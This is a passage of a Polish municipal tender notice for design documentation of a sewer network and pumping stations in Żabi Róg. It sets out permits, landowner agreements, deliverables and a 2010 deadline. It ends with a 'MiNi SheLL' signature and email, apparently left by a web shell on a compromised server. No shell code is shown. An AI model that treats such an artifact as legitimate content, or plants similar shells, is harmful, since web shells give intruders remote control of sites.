c)decyzje zezwalające na usunięcie drzew kolidujących z trasą sieci kanalizacji sanitarnej i przepompowni w zakresie jak w wykazie drzewostanu do usunięcia stanowiącego część składową dokumentacji projektowej.

5.Projektant powinien złożyć w imieniu Zamawiającego wniosek o uzyskanie decyzji o pozwoleniu na budowę i pozwolenia wodnoprawnego (jeżeli konieczny).
6.Zakres opracowań projektowych powinien być dostosowany do wymagań Rozporządzenia Rady Ministrów z dnia 2 października 2001 roku w sprawie szczegółowych zasad finansowania inwestycji z budżetu państwa (Dz. U. Nr 133 poz. 1480 z 2001 r.).
7.Dokumentacja winna być wykonana zgodnie z warunkami i obowiązującymi przepisami, a zastosowane rozwiązania projektowe winny zapewnić ekonomiczną realizację i eksploatację inwestycji.
8.Dokumentacja projektowa powinna być zgodna z:
a.Uzyskaną decyzją o ustaleniu lokalizacji inwestycji celu publicznego
b.Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz. U. z 16 września 2004 r., Nr 202, poz.2072 z późniejszymi zmianami ), obejmującej projekty budowlano - wykonawcze, kosztorysy ofertowe i kosztorysy inwestorskie,
c.Wymaganiami ustawy z dnia 7 lipca 1994 r. - Prawo Budowlane /Dz. U. Nr 106 z 2000 r. poz. 1126 - tekst jednolity z późniejszymi zmianami /,
d.Obowiązującymi normami i warunkami technicznymi przy projektowaniu obiektów kubaturowych.

9.Dokumentacja winna także zawierać: 
-	tabelaryczny wykaz działek ewidencyjnych przez które będzie przebiegała kanalizacja sanitarna
-	planu zagospodarowania terenu
-	część opisującą wydajność przepompowni, ilość ścieków i przekroje rurociągów, długość wg. średnic, ilość ścieków na dobę ( RLM )
-	opracowanie monitoringu przepompowni umożliwiające przesyłanie informacji o statusie z  wykorzystaniem technologii GSM.
-	oświadczenia osób nie zainteresowanych przyłączeniem do kanalizacji
-	opracowanie projektu budowlanego  przejścia kanalizacji sanitarnej przez tory kolejowe  zgodnie z wymogami :
 -  BN-80/8939-17 Przeprowadzanie  rurociągów  i kabli pod  torami kolejowymi,
 -  BN-75/8846-01 Roboty ziemne w  podtorzu kolejowym do układania  przewodów  rurowych,
-  Rozporządzenia  Ministra Transportu i Gospodarki Morskiej z dnia 10.09.1998r.w sprawie warunków  technicznych jakim powinny
odpowiadać budowle i ich usytuowanie ( Dz.U.98.151.987) oraz uzyska uzgodnienie z zarządcą linii kolejowej .
-	wykaz drzewostanu koniecznego do wycinki na trasie przebiegu sieci określający gatunek drzewa oraz jego obwód na wysokości 1,3 m, ilość, lokalizację na działce o Nr, określenie właściciela drzewostanu i jego adresu który będzie stanowił integralną część dokumentacji jw. (koszty usunięcia drzewostanu powinny zostać uwidocznione w kosztorysie inwestorskim a zakres usunięcia drzewostanu w przedmiarze robót)   

10.Projektant na etapie ustalania trasy winien rozwiązanie projektowe uzgodnić z osobami posiadającymi tytuł prawny do nieruchomości. W przypadku zmian trasy kanalizacji sanitarnej z jakichkolwiek przyczyn, Projektant zobowiązany jest do dokonania ponownych uzgodnień zmienionych rozwiązań projektowych z osobami posiadającymi tytuł prawny do nieruchomości i dołączenia aktualnego załącznika graficznego ( z podpisami projektanta i zainteresowanej osoby posiadającej tytuł prawny do nieruchomości).W przypadku wystąpienia działek z nieuregulowanym stanem prawnym, o zaistniałym fakcie należy natychmiast powiadomić Zamawiającego.
11.Projektant w ramach wynagrodzenia zobowiązuje się do pełnienia nadzoru autorskiego nad realizacją robót zawartych w opracowanej przez projektanta dokumentacji projektowej.
12.W zakres zadania wchodzi również ewentualna pomoc przy przygotowanie dokumentów koniecznych do uzyskania środków finansowych z instytucji współfinansujących tego typu inwestycje.
13.Wykonanie innych opracowań projektowych, w przypadku takiej konieczności, jak: operaty wodno-prawne, projekty odbudowy dróg, przełożenia w razie potrzeby sieci energetycznych,  wod-kan itp.
14.Dokumentacja winna posiadać wszelkie sprawdzenia, uzgodnienia i dokumenty             konieczne do uzyskania zatwierdzenia dokumentacji i uzyskania pozwolenia na budowę.
15.Koszt warunków technicznych, uzgodnień w Zespole Uzgodnień Dokumentacji Projektowej, sprawdzeń, uzgodnień, map do celów projektowania, dokumentów koniecznych do uzyskania zatwierdzenia dokumentacji i uzyskania pozwolenia na budowę Projektant ujmuje w cenie ofertowej.
16.Wszystkie elementy projektów, przedmiarów, kosztorysów powinny być oznaczone odpowiednimi kodami wspólnego słownika zamówień publicznych CPV.
17.Opisywanie proponowanych materiałów i urządzeń za pomocą parametrów technicznych, tzn. bez podawania ich nazw. Jeżeli nie będzie to możliwe i jedyną możliwością będzie podanie nazwy materiału lub urządzenia, Projektant zobowiązany jest do podania co najmniej dwóch producentów tych materiałów lub urządzeń.
18.Dokumentacja projektowa winna by sporządzona w sposób umożliwiającymi wykonanie zamówienia bez konieczności wykonywania dodatkowych opracowań. Projektant załączy wykaz opracowanej dokumentacji projektowej (wszystkie branże) oraz pisemne oświadczenie, że jest wykonana zgodnie z umową i kompletna z punktu widzenia celu, któremu ma służyć.
19.Wymaga się aby dokumentacje techniczne obejmowały wszystkie branże niezbędne do prawidłowego funkcjonowania , ponadto wszystkie projekty branżowe powinny być skoordynowane.
20.W ramach ustalonego w umowie wynagrodzenia, Projektant zobowiązuje się do udzielenia bez zbędnej zwłoki odpowiedzi na zapytania dotyczące przedmiotu zamówienia kierowane do Zamawiającego przez Wykonawców biorących udział w postępowaniu o udzielenie zamówienia na roboty budowlane określone przedmiotem umowy.
21.Wszelkie czynności prawne i faktyczne w szczególności koszty przejazdów w celu dokonania uzgodnień z Zamawiającym obciążają Projektanta.
22.Zamawiający zastrzega sobie prawo zmiany zakresu rzeczowego przedmiotu zamówienia  w oparciu o uzyskane uzgodnienia i opinie.

Dokumentacja na każdym etapie przygotowań i realizacji powinna być konsultowana z przedstawicielami Zamawiającego. Ważną sprawą jest dokonanie prawidłowych uzgodnień z właścicielami nieruchomości gruntowych. Uzgodnienia z właścicielami gruntów powinny dotyczyć udostępnienia nieruchomości gruntowych w celu dokonania czynności związanych z budową i eksploatacją sieci kanalizacji sanitarnej na zasadzie użyczenia nieodpłatnie, a w przypadku przepompowni kanalizacyjnych zgoda na lokalizację bez podziału gruntów na zasadzie użyczenia nieodpłatnie lub z podziałem gruntu i sprzedażą dla Gminy części pod przepompownię. W przypadku nieuzyskania takowej zgody proponowana przez Zamawiającego (w dołączonej mapie poglądowej) trasa rurociągów powinna być skorygowana i przedstawiona do zaakceptowania Zamawiającemu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.22.00-3, 71.32.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.07.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Budowa kanalizacji sanitarnej we wsi Żabi Róg - wykonanie dokumentacji technicznej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest opracowanie projektu budowlanego - wykonawczego  na budowę sieci kanalizacji sanitarnej wraz z przepompowniami kanalizacyjnymi na sieci  w zakresie określonym kolorem czerwonym (granice opracowania)  na załączonej kopii mapy ewidencyjnej w skali 1 : 5000  terenu wsi Zabi Róg.  Opracowanie projektowe w zakresie kanalizacji sanitarnej powinno obejmować swoim zasięgiem budynki mieszkalne i niemieszkalne istniejące a w tym nowo wybudowane oraz będące w budowie i planowane do realizacji (posiadające ważne pozwolenie na budowę ) oraz inne budynki znajdujące się w określonych na w/w mapie  granicach opracowania. Sieć kanalizacyjna dla potrzeb  poszczególnych budynków  mieszkalnych i innych produkujących ścieki komunalne powinna być doprowadzona do granicy działki i zakończona studzienką umożliwiającą podłączenie w/w budynków do sieci za pośrednictwem przyłączy kanalizacyjnych których zaprojektowanie i wykonanie nastąpi na koszt Właściciela nieruchomości (budynku).
Lokalizacja studzienki przy granicy danej działki powinna być uzgodniona z jej Właścicielem.
Projektant powinien odbyć wizytację terenową w celu zapoznania się z warunkami terenowymi i gruntowymi terenu na którym ma być zaprojektowana sieć, celem określenia  kosztów realizacji zadania projektu .Opracowanie powinno zawierać bilans ścieków dla zakresu jw. w rozbiciu na ścieki komunalne i przemysłowe.
Ogólna ilość ścieków ujęta w zaprojektowanej sieci kanalizacji sanitarnej dla Żabiego Rogu powinna być sprowadzona do istniejących przepompowni P-18 i P- GAJA 2015 zaznaczonych na załączonej mapie ewidencyjnej lub do przepompowni nowo zaprojektowanej z włączeniem jej do istniejącej kanalizacji tłocznej.

ZAKRES OPRACOWANIA PRZYJĘTY DO REALIZACJI PRZEZ WYKONAWCĘ-PROJEKTANTA OBEJMUJE  RÓWNIEŻ:
1.	Przygotowanie materiałów do projektowania:
a)	Uzyskanie decyzji o lokalizacji inwestycji celu publicznego,
b)	Sporządzenie  przez Projektanta  w  imieniu Zamawiającego wniosku o wydanie i uzyskanie warunków przyłączenia do sieci elektroenergetycznej instalacji elektrycznej przepompowni sieciowych (w tym oświetlenia),
c)	Pozyskanie na koszt i staraniem Projektanta map sytuacyjno-wysokościowych do celów projektowych. Mapa do celów projektowych sytuacyjno-wysokościowa powinna posiadać aktualną klauzulę właściwego ośrodka geodezyjnego oraz powinna spełniać wymagania określone w ustawie. Zamawiający ma otrzymać mapę numeryczną w formacie danych *.dwg na nośniku CD- R oraz w wersji papierowej. Mapy muszą obejmować inwentaryzację podziemną i nadziemną oraz inwentaryzację drzew, wymaga się również dokonania geodezyjnej aktualizacji umiejscowienia istniejącej infrastruktury
d)	Opracowanie na koszt i staraniem Projektanta  warunków gruntowo-wodnych niezbędnych dla potrzeb posadowienia  przepompowni sieciowych ( dla każdej przepompowni oddzielnie) 
e)	Określenie na koszt i staraniem Projektanta warunków gruntowo-wodnych niezbędnych dla potrzeb posadowienia  poszczególnych odcinków sieci  w zakresie niezbędnym a określonym przez projektanta.  
f)	Opracowanie karty informacyjnej przedsięwzięcia o której mowa w art. 3.1. pkt. 5 ustawy z dnia 3 października 2008 r. o udostępnieniu informacji o środowisku i jego ochronie, udziale  społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko  (Dz. U. Nr 199, poz. 1227)
g)	Wyrysy i wypisy z rejestru ewidencji gruntów objętych opracowaniem
h)	Dokonanie uzgodnień (zgodnie z załączonym drukiem) z wszystkimi właścicielami nieruchomości przez które będzie przebiegać zaprojektowana sieć oraz lokalizacją przepompowni a w tym uzyskaniem zgody na :
-	zaprojektowanie na posesji kanalizacji sanitarnej i przepompowni
-	wykonanie robót ziemnych wraz z wykopami w systemie otwartym  i przecisku sterowanego
-	umieszczenie i pozostawienie na terenie nieruchomości urządzeń podziemnych i naziemnych związanych z realizacją kanalizacji sanitarnej w ramach zaprojektowanego zadania ,
-	lokalizację, umieszczenie i pozostawienie na terenie nieruchomości  przepompowni ścieków wraz z urządzeniem naziemnym i podziemnym zagospodarowania terenu w tym : dróg i placów oraz ogrodzenia, studzienek sieci wodociągowej i zasilania elektroenergetycznego niezbędnych do obsługi przepompowni sieciowej.
-	wyrażenie zgody na wejście na teren nieruchomości na której zlokalizowano i umieszczono przepompownię sieciową wraz z jej zagospodarowaniem naziemnym i podziemnym konserwatora, Właściciela sieci lub Zarządcy celem dokonywania ich przeglądów eksploatacyjnych  i konserwacji

i)	Uzyskanie pozostałych warunków technicznych oraz materiałów i danych koniecznych do prawidłowego opracowania dokumentacji technicznej a w tym między innymi uzgodnień i zezwoleń (o ile byłoby to konieczne) na przejścia                 z siecią pod drogami i torowiskiem PKP  oraz uzyskanie uzgodnienia                             z Właścicielem  lub Zarządcą  oczyszczalni (sieci) do której będą kierowane ścieki z w/w obszaru na  włączenie projektowanej sieci kanalizacji sanitarnej do istniejącej sieci oraz uzgodnienia z rzeczoznawcami ds. zabezpieczenia p. poż , bhp i ergonomii ,rzeczoznawcę ds. sanitarno - higienicznych (o ile jest to niezbędne)
j)	Dokonanie uzgodnień branżowych przy kolizjach z istniejącym uzbrojeniem     i opracowanie ewentualnych projektów dotyczących przełożenia sieci.

2.	Opracowanie kompletnej dokumentacji projektowej w zakresie i formie zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz. U. z 16 września 2004 r., Nr 202, poz.2072) obejmującej :

a)	Dokumentację budowlano - wykonawczą  sieci kanalizacji sanitarnej wraz                  z bilansem ścieków i wytycznymi do planu BIOZ oraz częścią formalno-prawną pozwalającą na uzyskanie pozwolenia na budowę  zawierającą między innymi wszystkie uzgodnienia, warunki techniczne, decyzje, postanowienia, wykaz działek  przez które przebiega inwestycja, wypis z rejestru gruntów                                i oświadczenia  -  6 kpl,
b)	Dokumentację geotechniczną dotycząca warunków posadowienia przepompowni                          i poszczególnych odcinków sieci (w niezbędnym zakresie) - 6 egz.
c)	Dokumentację budowlano-wykonawczą przepompowni sieciowych kanalizacji sanitarnej i wytycznymi do planu BIOZ wraz z warunkami przyłączenia się do sieci elektroenergetycznej w zakresie przyłącza elektrycznego  przed i zalicznikowego, ogrodzeniem terenu przepompowni, drogami dojazdowymi oraz ich oświetleniem            - 6 kpl,
d)	Projekt czasowej organizacji ruchu w przypadku prac na drogach      - 3 egz.
e)	Kosztorys inwestorski w formie i treści zgodnej z § 7 Rozporządzenia Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczenia planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym (Dz.U. z 2004 r. Nr 130, poz. 1389 z póżn. zm.) w układzie specyfikacyjnym (tj. z podziałem na poszczególne branże) -  2 kpl,
f)	Przedmiary robót z określeniem podstaw wyceny dla branż i rodzajów robót dla zadania jw. (w układzie specyfikacyjnym) - 3 egz.	
g)	Zbiorcze zestawienie kosztów uwzględniająca wszystkie koszty (koszt opracowania dokumentacji, wykonania robót z rozbiciem na poszczególne zakresy, nadzór inwestorski, wykup gruntów pod przepompownie, odszkodowania z tytułu prowadzonych robót) 			            - 2 kpl,
h)	Specyfikacja techniczna wykonania i odbioru robót                   	- 6 kpl.
i)	Szczegółowa specyfikacja techniczna wykonania i odbioru (jeżeli konieczna)              - 6kpl.

3.	Całość opracowania w formie elektronicznej (część tekstowa opracowania w formacie *.doc [MS Word] i *.pdf [Adobe Reader] , część rysunkowa w formacie *.dwg lub *.dxf [Autocad] oraz w *.pdf [Adobe Reader] ; kosztorys i przedmiar robót                        w formacie *.ath [Norma] oraz *.pdf [Adobe Reader]  - 2 egz. (płyta CD lub DVD).

      4.  Projektant powinien uzyskać:
a)	decyzję o środowiskowych uwarunkowaniach zgody na realizację przedsięwzięcia polegającego na budowie sieci kanalizacji sanitarnej z przepompowniami we  wsi Żabi Róg wraz z raportem o oddziaływaniu przedsięwzięcia na środowisko (gdy zajdzie konieczność jego sporządzenia)
b)	opinię Zespołu Uzgodnień Dokumentacji Projektowej
c)	decyzje zezwalające na usunięcie drzew kolidujących z trasą sieci kanalizacji sanitarnej i przepompowni w zakresie jak w wykazie drzewostanu do usunięcia stanowiącego część składową dokumentacji projektowej.

5.	Projektant powinien złożyć w imieniu Zamawiającego wniosek o uzyskanie decyzji o pozwoleniu na budowę i pozwolenia wodnoprawnego (jeżeli konieczny).
6.	Zakres opracowań projektowych powinien być dostosowany do wymagań Rozporządzenia Rady Ministrów z dnia 2 października 2001 roku w sprawie szczegółowych zasad finansowania inwestycji z budżetu państwa (Dz. U. Nr 133 poz. 1480 z 2001 r.).
7.	Dokumentacja winna być wykonana zgodnie z warunkami i obowiązującymi przepisami, a zastosowane rozwiązania projektowe winny zapewnić ekonomiczną realizację i eksploatację inwestycji.
8.	Dokumentacja projektowa powinna być zgodna z:
a.	Uzyskaną decyzją o ustaleniu lokalizacji inwestycji celu publicznego
b.	Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz. U. z 16 września 2004 r., Nr 202, poz.2072 z późniejszymi zmianami ), obejmującej projekty budowlano - wykonawcze, kosztorysy ofertowe i kosztorysy inwestorskie,
c.	Wymaganiami ustawy z dnia 7 lipca 1994 r. - Prawo Budowlane /Dz. U. Nr 106 z 2000 r. poz. 1126 - tekst jednolity z późniejszymi zmianami /,
d.	Obowiązującymi normami i warunkami technicznymi przy projektowaniu obiektów kubaturowych.

9.	Dokumentacja winna także zawierać: 
-	tabelaryczny wykaz działek ewidencyjnych przez które będzie przebiegała kanalizacja sanitarna
-	planu zagospodarowania terenu
-	część opisującą wydajność przepompowni, ilość ścieków i przekroje rurociągów, długość wg. średnic, ilość ścieków na dobę ( RLM )
-	opracowanie monitoringu przepompowni umożliwiające przesyłanie informacji o statusie z  wykorzystaniem technologii GSM.
-	oświadczenia osób nie zainteresowanych przyłączeniem do kanalizacji
-	opracowanie projektu budowlanego  przejścia kanalizacji sanitarnej przez tory kolejowe  zgodnie z wymogami :
 -  BN-80/8939-17 Przeprowadzanie  rurociągów  i kabli pod  torami kolejowymi,
 -  BN-75/8846-01 Roboty ziemne w  podtorzu kolejowym do układania  przewodów  rurowych,
-  Rozporządzenia  Ministra Transportu i Gospodarki Morskiej z dnia 10.09.1998r.w sprawie warunków  technicznych jakim powinny odpowiadać budowle i ich usytuowanie ( Dz.U.98.151.987) oraz uzyska uzgodnienie z zarządcą linii kolejowej .
-	wykaz drzewostanu koniecznego do wycinki na trasie przebiegu sieci określający gatunek drzewa oraz jego obwód na wysokości 1,3 m, ilość, lokalizację na działce o Nr, określenie właściciela drzewostanu i jego adresu który będzie stanowił integralną część dokumentacji jw. (koszty usunięcia drzewostanu powinny zostać uwidocznione w kosztorysie inwestorskim a zakres usunięcia drzewostanu w przedmiarze robót)   
10.	Projektant na etapie ustalania trasy winien rozwiązanie projektowe uzgodnić z osobami posiadającymi tytuł prawny do nieruchomości. W przypadku zmian trasy kanalizacji sanitarnej z jakichkolwiek przyczyn, Projektant zobowiązany jest do dokonania ponownych uzgodnień zmienionych rozwiązań projektowych z osobami posiadającymi tytuł prawny do nieruchomości i dołączenia aktualnego załącznika graficznego ( z podpisami projektanta i zainteresowanej osoby posiadającej tytuł prawny do nieruchomości).W przypadku wystąpienia działek z nieuregulowanym stanem prawnym, o zaistniałym fakcie należy natychmiast powiadomić Zamawiającego.
11.	Projektant w ramach wynagrodzenia zobowiązuje się do pełnienia nadzoru autorskiego nad realizacją robót zawartych w opracowanej przez projektanta dokumentacji projektowej.
12.	W zakres zadania wchodzi również ewentualna pomoc przy przygotowanie dokumentów koniecznych do uzyskania środków finansowych z instytucji współfinansujących tego typu inwestycje.
13.	Wykonanie innych opracowań projektowych, w przypadku takiej konieczności, jak: operaty wodno-prawne, projekty odbudowy dróg, przełożenia w razie potrzeby sieci energetycznych,  wod-kan itp.
14.	Dokumentacja winna posiadać wszelkie sprawdzenia, uzgodnienia i dokumenty             konieczne do uzyskania zatwierdzenia dokumentacji i uzyskania pozwolenia na budowę.
15.	Koszt warunków technicznych, uzgodnień w Zespole Uzgodnień Dokumentacji Projektowej, sprawdzeń, uzgodnień, map do celów projektowania, dokumentów koniecznych do uzyskania zatwierdzenia dokumentacji i uzyskania pozwolenia na budowę Projektant ujmuje w cenie ofertowej.
16.	Wszystkie elementy projektów, przedmiarów, kosztorysów powinny być oznaczone odpowiednimi kodami wspólnego słownika zamówień publicznych CPV.
17.	Opisywanie proponowanych materiałów i urządzeń za pomocą parametrów technicznych, tzn. bez podawania ich nazw. Jeżeli nie będzie to możliwe i jedyną możliwością będzie podanie nazwy materiału lub urządzenia, Projektant zobowiązany jest do podania co najmniej dwóch producentów tych materiałów lub urządzeń.
18.	Dokumentacja projektowa winna by sporządzona w sposób umożliwiającymi wykonanie zamówienia bez konieczności wykonywania dodatkowych opracowań. Projektant załączy wykaz opracowanej dokumentacji projektowej (wszystkie branże) oraz pisemne oświadczenie, że jest wykonana zgodnie z umową i kompletna z punktu widzenia celu, któremu ma służyć.
19.	Wymaga się aby dokumentacje techniczne obejmowały wszystkie branże niezbędne do prawidłowego funkcjonowania , ponadto wszystkie projekty branżowe powinny być skoordynowane.
20.	W ramach ustalonego w umowie wynagrodzenia, Projektant zobowiązuje się do udzielenia bez zbędnej zwłoki odpowiedzi na zapytania dotyczące przedmiotu zamówienia kierowane do Zamawiającego przez Wykonawców biorących udział w postępowaniu o udzielenie zamówienia na roboty budowlane określone przedmiotem umowy.
21.	Wszelkie czynności prawne i faktyczne w szczególności koszty przejazdów w celu dokonania uzgodnień z Zamawiającym obciążają Projektanta.
22.	Zamawiający zastrzega sobie prawo zmiany zakresu rzeczowego przedmiotu zamówienia  w oparciu o uzyskane uzgodnienia i opinie.

Dokumentacja na każdym etapie przygotowań i realizacji powinna być konsultowana z przedstawicielami Zamawiającego. Ważną sprawą jest dokonanie prawidłowych uzgodnień z właścicielami nieruchomości gruntowych. Uzgodnienia z właścicielami gruntów powinny dotyczyć udostępnienia nieruchomości gruntowych w celu dokonania czynności związanych z budową i eksploatacją sieci kanalizacji sanitarnej na zasadzie użyczenia nieodpłatnie, a w przypadku przepompowni kanalizacyjnych zgoda na lokalizację bez podziału gruntów na zasadzie użyczenia nieodpłatnie lub z podziałem gruntu i sprzedażą dla Gminy części pod przepompownię. W przypadku nieuzyskania takowej zgody proponowana przez Zamawiającego (w dołączonej mapie poglądowej) trasa rurociągów powinna być skorygowana i przedstawiona do zaakceptowania Zamawiającemu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.22.00-3, 71.32.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.07.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com